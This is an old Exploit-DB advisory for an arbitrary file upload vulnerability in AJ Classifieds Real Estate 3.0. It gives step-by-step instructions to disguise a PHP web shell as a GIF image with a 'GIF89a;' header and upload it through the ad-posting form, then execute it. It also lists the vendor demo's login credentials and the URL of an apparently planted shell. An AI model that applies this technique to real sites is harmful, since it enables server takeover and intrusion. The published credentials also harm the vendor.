Aj Classifieds Real Estate 3.0 - Arbitrary File Upload

EDB-ID:

7809

CVE:



Author:

ZoRLu

Type:

webapps


Platform:

PHP

Date:

2009-01-16


[~] AJClassifieds Realestate RFu
[~]
[~] script down: http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Realestate/
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 16.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com 
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

first register to site 

you add this code your shell to head 

GIF89a; 

example your_shell.php:

GIF89a;
<?

...

...

...

?>

and save your_sheell.php

you go index.php?do=postad

add you post select your image for Main Image and Thumbnail Image

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp for demo:

user: demouser@ajsquare.com

pass: demouser

http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Realestate/uploadimages/20090116070716c.php

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org  &  experl.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-16]